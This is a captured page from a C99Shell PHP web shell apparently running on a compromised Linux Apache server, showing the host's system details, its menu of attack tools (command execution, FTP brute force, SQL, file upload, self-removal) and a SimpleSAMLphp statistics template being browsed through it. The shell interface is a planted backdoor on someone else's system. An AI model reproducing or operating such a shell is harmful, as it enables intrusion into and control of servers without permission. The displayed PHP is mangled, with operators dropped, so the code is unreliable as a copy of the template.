!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/3ros/simplesamlphp/modules/statistics/templates/   drwxrwxr-x
Free 13.65 GB of 61.93 GB (22.05%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     statmeta-tpl.php (1.47 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$this
->data['header'] = 'SimpleSAMLphp Statistics Metadata';
$this->includeAtTemplateBase('includes/header.php');

?>


<?php

echo('<table style="width: 100%">');

if (isset(
$this->data['metadata'])) {

    if (isset(
$this->data['metadata']['lastrun'] )) {
        echo(
'<tr><td>Aggregator last run at</td><td>' 
            
date('l jS \of F Y H:i:s'$this->data['metadata']['lastrun']) . 
            
'</td></tr>');
    }

    if (isset(
$this->data['metadata']['notBefore'] )) {
        echo(
'<tr><td>Aggregated data until</td><td>' 
            
date('l jS \of F Y H:i:s'$this->data['metadata']['notBefore']) . 
            
'</td></tr>');
    }
    
    if (isset(
$this->data['metadata']['memory'] )) {
        echo(
'<tr><td>Memory usage</td><td>' 
            
number_format($this->data['metadata']['memory'] / (1024*1024), 2) . ' MB' 
            
'</td></tr>');
    }
    if (isset(
$this->data['metadata']['time'] )) {
        echo(
'<tr><td>Execution time</td><td>' 
            
$this->data['metadata']['time'] . ' seconds' .
            
'</td></tr>');
    }
    if (isset(
$this->data['metadata']['lastlinehash'] )) {
        echo(
'<tr><td>SHA1 of last processed logline</td><td>' 
            
$this->data['metadata']['lastlinehash'] .
            
'</td></tr>');
    }
    if (isset(
$this->data['metadata']['lastline'] )) {
        echo(
'<tr><td>Last processed logline</td><td>' 
            
$this->data['metadata']['lastline'] .
            
'</td></tr>');
    }
    
    
} else {
    echo(
'<tr><td>No metadata found</td></tr>');
}

echo(
'</table>');

echo(
'<p>[ <a href="showstats.php">Show statistics</a> ] </p>');

$this->includeAtTemplateBase('includes/footer.php');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.4795 ]--